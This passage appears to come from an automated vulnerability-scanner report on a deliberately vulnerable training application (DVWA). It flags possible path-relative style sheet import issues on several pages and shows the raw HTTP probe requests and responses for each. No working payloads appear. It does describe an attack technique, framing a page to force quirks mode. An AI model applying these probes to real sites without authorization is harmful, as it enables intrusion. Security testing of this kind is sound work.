Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
POST /vulnerabilities/csp/index.php/id5hrb/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=258eb52ea54dcc77d6cc80dfdfca473c
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csp/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 14
include=WvEMlU
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:12 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4164
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com ;
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Content Security Policy (CSP) Bypass :: Damn Vulnerable W
...[SNIP]...
19.10. https://pentest-ground.com:4280/vulnerabilities/csrf/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/csrf/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=98ee9b9a0d183d8d3d0bb32deb3985c7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5359
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/csrf/index.php/fhrzqh/o85nyi/r4w0el/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=98ee9b9a0d183d8d3d0bb32deb3985c7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:58:01 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5359
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/csrf/index.php/fhrzqh/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=98ee9b9a0d183d8d3d0bb32deb3985c7
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:58:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 5359
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Cross Site Request Forgery (CSRF) :: Damn Vulnerable Web
...[SNIP]...
19.11. https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/csrf/test_credentials.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
POST /vulnerabilities/csrf/test_credentials.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d408fe19a4934d762393bc5ad960b156
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:50 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/source.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
POST /vulnerabilities/csrf/test_credentials.php/sxwyoq/k01igi/xjh2g9/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d408fe19a4934d762393bc5ad960b156
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:04 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/source.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
POST /vulnerabilities/csrf/test_credentials.php/sxwyoq/dvwa/css/source.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=d408fe19a4934d762393bc5ad960b156
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/csrf/test_credentials.php
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 31
username=&password=&Login=Login
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:05 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 1079
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Damn Vulnerable Web Application (DVWA)Test Credentials</title>
<link
...[SNIP]...
19.12. https://pentest-ground.com:4280/vulnerabilities/exec/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/exec/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
POST /vulnerabilities/exec/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=0bd67b9beb0db5a6f9351116428b3354
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:24 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
POST /vulnerabilities/exec/index.php/y36bcr/if060r/okn84v/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6bc3bde0173ee966e019e7286a8f5d9c
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:57 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
POST /vulnerabilities/exec/index.php/y36bcr/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=13401a3221bbd1c3a3ad84ebd03bc23c
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/exec/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 23
ip=CcwtLI&Submit=Submit
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:56:58 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4104
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Command Injection :: Damn Vulnerable Web Application (DVW
...[SNIP]...
19.13. https://pentest-ground.com:4280/vulnerabilities/fi/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/fi/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/fi/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=40e1f5a6d819e8ffc29608da8a559c07
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:50 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4094
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/fi/index.php/f3oa0x/dovtor/qu5gus/?page=file1.php HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=40e1f5a6d819e8ffc29608da8a559c07
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:44:27 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4094
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Inclusion :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/fi/index.php/f3oa0x/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=40e1f5a6d819e8ffc29608da8a559c07
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/fi/?page=include.php
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:44:28 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 362
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<br />
<b>Warning</b>: Undefined array key "page" in <b>/var/www/html/vulnerabilities/fi/source/low.php</b> on line <b>4</b><br />
<br />
<b>Warning</b>: Cannot modify header information - headers a
...[SNIP]...
19.14. https://pentest-ground.com:4280/vulnerabilities/javascript/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/javascript/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
POST /vulnerabilities/javascript/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6e6a7523219fb665633f9393ffa391c8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:38:48 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
POST /vulnerabilities/javascript/index.php/q2n1rs/dsuoww/su4je8/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6e6a7523219fb665633f9393ffa391c8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:26 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
